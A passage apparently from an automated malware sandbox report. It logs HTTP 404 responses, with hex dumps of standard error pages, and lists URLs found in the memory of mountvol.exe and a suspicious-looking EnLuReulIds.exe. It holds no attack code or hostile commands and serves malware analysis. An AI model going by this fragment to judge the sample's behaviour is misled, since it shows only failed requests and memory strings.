                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dqwxji09v79CJXsGDAyIFzRR7%2F6N31VQVfUsOHOtuiNT%2ByDw91RA0GRKOidrsFYT4Nq1DxZUrPZkHAe%2FpCS%2BpJKSD553%2B40k32s8ww49DkLH8nfqAYHgIr%2BfEMwSpsQtV63X78eCplpf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81cc0ccbe8c43b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1488&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=onSbGqX3FivBa7fkhoyvrasE1koFyJmnMd7wldbYiBArGcAn7BTbCECDDaJhoF195ishCwaVpSksMH5yMmJ1G2IbD2eAfwPX6ajGx2r%2BPs3hCx1Eg0JgZaWrUXNvieLZ%2F4aDgJJBlpjW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81cc1d2f2143e3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1709&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1813&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGIQVYX6BGrB5WQUwYt2ob%2BmWuMLsKO5XNlcQm%2FhMq4tlAzAMMPB9J1vQZXDTgoFuw8i%2FuFlrGCyWHJiHPTNY6JCBJeYOu3vD%2FH9TYuHvq%2BTzoRnPqlt1P1WmDs3eUh5Tt5zMMJ2uKb6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e81cc2e0edc0f4b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1694&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=516&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 
64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:56:36 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693a1e3-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:56:41 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693a1e3-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:56:44 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693a1e3-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:51 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:54 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:57 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:56:59 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 32 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 12:57:08 GMT | Content-Type: text/html | Content-Length: 19268 | Connection: close | Server: Apache | Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT | Accept-Ranges: bytes
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 12:57:10 GMT | Content-Type: text/html | Content-Length: 19268 | Connection: close | Server: Apache | Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT | Accept-Ranges: bytes
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 12:57:13 GMT | Content-Type: text/html | Content-Length: 19268 | Connection: close | Server: Apache | Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT | Accept-Ranges: bytes
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 12:57:16 GMT | Content-Type: text/html | Content-Length: 19268 | Connection: close | Server: Apache | Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Mon, 25 Nov 2024 12:58:24 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Mon, 25 Nov 2024 12:58:26 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Mon, 25 Nov 2024 12:58:29 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | date: Mon, 25 Nov 2024 12:58:32 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 12:58:41 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 12:58:44 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 12:58:47 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004BD8000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.0000000003FF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
